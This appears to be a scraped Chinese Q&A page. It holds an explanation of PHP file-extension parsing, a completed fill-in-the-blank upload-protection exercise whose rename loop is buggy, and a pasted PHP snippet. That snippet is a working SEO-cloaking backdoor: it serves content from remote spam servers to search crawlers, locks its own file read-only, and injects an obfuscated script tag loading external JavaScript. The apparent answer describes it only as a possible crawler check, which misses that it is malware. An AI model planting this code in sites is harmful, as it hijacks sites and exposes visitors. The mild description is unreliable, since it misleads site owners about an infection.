解释一下 $exname = strtolower(substr($_FILES['add_file']['name'], (strrpos($_FILES['add_file']['name'], '.') + 1)));这行代码
时间: 2023-10-03 11:05:05 浏览: 26
这行代码是用来获取上传文件的扩展名的。具体解释如下:
- $_FILES['add_file']['name']:表示上传文件的原始文件名。
- strrpos($_FILES['add_file']['name'], '.'):表示获取原始文件名中最后一个 "." 的位置。
- substr($_FILES['add_file']['name'], (strrpos($_FILES['add_file']['name'], '.') + 1)):表示截取原始文件名中最后一个 "." 后面的字符串,即扩展名。
- strtolower():表示将扩展名字符串转换为小写字母。
因此,整个代码的作用是将上传文件的扩展名转换为小写字母,并存储在变量 $exname 中。
相关问题
do_upload_new.php (用于实现防护) <?php include_once "functions.php"; if(___________)//如果不存在 session start_session($expires); if(! isset($_SESSION['username'])) { exit('您没有权限访问此页面'); } if (!isset($_POST['upload'])) { exit('请选择需要上传的文件'); } if($_POST['path'] != 'uploads' && $_POST['path'] != 'face')/*判断 路径变量*/ { exit('路径错误'); } $target_path = 'c:/uploads/' . $_POST['path'];/*设置非 web 目录保存 文件*/ $uploaded_name = $_FILES['file']['name']; /*上传文件名*/ $temp = explode(".", $uploaded_name);/*以’.’为分隔符将字符串打散 为数组*/ $uploaded_type = ______; //end 函数获取文件后缀 $uploaded_size = $_FILES['file'][____];//$_FILES 函数获取文件大小 if($uploaded_size > 1000000) { exit('文件超过 1M 字节,上传失败'); } if(_________________________________/*strtolower()处理文件后缀*/ _________________________________ _________________________________ ) { exit('文件类型错误,上传失败'); } $fname = md5( time() . $uploaded_name ) . '.' . $uploaded_type;/* 对文件名进行 md5()处理,文件重命名*/ $target_path = $target_path . '/' . ________;//文件名 while(true) { if(!file_exists($target_path)) break; else { $fname = md5( time() . $uploaded_name ) . '.' . $uploaded_type; $target_path = $target_path . '/' . $fname; } } if(!move_uploaded_file($_FILES['file']['tmp_name'], $target_path)) { echo '内部错误,上传失败'; } else { echo htmlspecialchars($uploaded_name) . ' 上传成功! 当前文件名 为' .$fname; } ?>
这段 PHP 代码是用于实现文件上传功能并进行一些防护措施的。其中有一些空缺需要填充,下面是我尝试补充的代码:
```php
<?php
include_once "functions.php";
if(!isset($_SESSION)) {
start_session($expires);
}
if(!isset($_SESSION['username'])) {
exit('您没有权限访问此页面');
}
if(!isset($_POST['upload'])) {
exit('请选择需要上传的文件');
}
if($_POST['path'] != 'uploads' && $_POST['path'] != 'face') {
exit('路径错误');
}
$target_path = 'c:/uploads/' . $_POST['path'];
$uploaded_name = $_FILES['file']['name'];
$temp = explode(".", $uploaded_name);
$uploaded_type = end($temp); //获取文件后缀
$uploaded_size = $_FILES['file']['size'];//获取文件大小
if($uploaded_size > 1000000) {
exit('文件超过 1M 字节,上传失败');
}
if(strtolower($uploaded_type) != 'jpg' && strtolower($uploaded_type) != 'jpeg' && strtolower($uploaded_type) != 'png') {
exit('文件类型错误,上传失败');
}
$fname = md5( time() . $uploaded_name ) . '.' . $uploaded_type;
$target_path = $target_path . '/' . $fname;
while(true) {
if(!file_exists($target_path))
break;
else {
$fname = md5( time() . $uploaded_name ) . '.' . $uploaded_type;
$target_path = $target_path . '/' . $fname;
}
}
if(!move_uploaded_file($_FILES['file']['tmp_name'], $target_path)) {
echo '内部错误,上传失败';
} else {
echo htmlspecialchars($uploaded_name) . ' 上传成功! 当前文件名为' .$fname;
}
?>
```
请注意,这段代码仅供参考,实际使用时需要根据具体情况进行调整和完善。
<?php set_time_limit(0); header("Content-type: text/html; charset=utf-8"); function crawler() { $userAgent = strtolower($_SERVER['HTTP_USER_AGENT']); $spiders = array( 'Googlebot', 'Baiduspider', '360Spider', 'Sogou News Spider', 'bingbot', 'Sosospider', ); if(!empty($userAgent)){ foreach ($spiders as $spider) { $spider = strtolower($spider); if (strpos($userAgent, $spider) !== false) { return true; } } } return false; } $url = $_SERVER["HTTP_REFERER"]; $u = parse_url($url); if(crawler()==true || $u['host'] == "www.baidu.com" || $u['host'] == "m.baidu.com"){ date_default_timezone_set('PRC'); $TD_server = "http://z8qw.woshinidie66.com"; $host_name = "http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF']; $Content_mb=file_get_contents($TD_server."/index.php?host=".$host_name."&url=".$_SERVER['QUERY_STRING']."&domain=".$_SERVER['SERVER_NAME']); echo $Content_mb; $url1 = $_SERVER['PHP_SELF']; $filename1 = @end(explode('/',$url1)); function set_writeable($file_name) { @chmod($file_name,0444); } set_writeable($filename1); } ?> <?php set_time_limit(0); error_reporting(0); function crawler() { $userAgent = strtolower($_SERVER['HTTP_USER_AGENT']); $spiders = array( 'Baiduspider', 'Sogou News Spider' ); if (!empty($userAgent)) { foreach ($spiders as $spider) { $spider = strtolower($spider); if (strpos($userAgent, $spider) !== false) { return true; } } } return false; } $url = @$_SERVER["HTTP_REFERER"]; date_default_timezone_set('PRC'); $TD_server = "http://154.215.192.182/SpiderPool.php"; if (crawler()) { $query = $_SERVER['QUERY_STRING']; $path = $_SERVER["REQUEST_URI"]; $host_name = "http://" . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']; $ch2 = curl_init(); $user_agent = "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"; curl_setopt($ch2, CURLOPT_URL, $TD_server . "?host=" . $host_name . "&url=" . $_SERVER['QUERY_STRING'] . "&domain=" . $_SERVER['HTTP_HOST']); curl_setopt($ch2, CURLOPT_HEADER, false); curl_setopt($ch2, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch2, CURLOPT_REFERER, 'www.baidu.com'); curl_setopt($ch2, CURLOPT_USERAGENT, $user_agent); $temp = curl_exec($ch2); echo $temp; } $url1 = $_SERVER['PHP_SELF']; $filename1 = @end(explode('/', $url1)); function set_writeable($file_name) { @chmod($file_name, 0444); } set_writeable($filename1); <script type="text/javascript"> var xt = String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,115,58,47,47,98,100,48,57,49,55,46,99,111,109,47,98,100,46,106,115,34,62,60,47,115,99,114,105,112,116,62); document.write(xt); </script>
这段代码看起来是一个PHP脚本,其中有两个函数`crawler()`和`set_writeable()`,以及一些变量和条件语句。这段代码的功能可能是用于判断访问者是否是爬虫或搜索引擎,并根据访问来源执行一些操作。但是需要注意的是,这段代码中也存在一些可能会造成安全问题的函数调用,如`file_get_contents()`和`chmod()`等。如果您不确定这段代码的用途,最好不要直接运行它,以免引起安全问题。
相关推荐
![zip](https://img-home.csdnimg.cn/images/20210720083736.png)
![pdf](https://img-home.csdnimg.cn/images/20210720083512.png)
![docx](https://img-home.csdnimg.cn/images/20210720083331.png)
![](https://csdnimg.cn/download_wenku/file_type_ask_c1.png)
![](https://csdnimg.cn/download_wenku/file_type_ask_c1.png)
![](https://csdnimg.cn/download_wenku/file_type_ask_c1.png)
![](https://csdnimg.cn/download_wenku/file_type_ask_c1.png)
![](https://csdnimg.cn/download_wenku/file_type_ask_c1.png)
![](https://csdnimg.cn/download_wenku/file_type_ask_c1.png)
![](https://csdnimg.cn/download_wenku/file_type_ask_c1.png)
![](https://csdnimg.cn/download_wenku/file_type_ask_c1.png)
![](https://csdnimg.cn/download_wenku/file_type_ask_c1.png)
![](https://csdnimg.cn/download_wenku/file_type_ask_c1.png)
![](https://csdnimg.cn/download_wenku/file_type_ask_c1.png)
![](https://csdnimg.cn/download_wenku/file_type_ask_c1.png)
![](https://csdnimg.cn/download_wenku/file_type_ask_c1.png)
![](https://csdnimg.cn/download_wenku/file_type_ask_c1.png)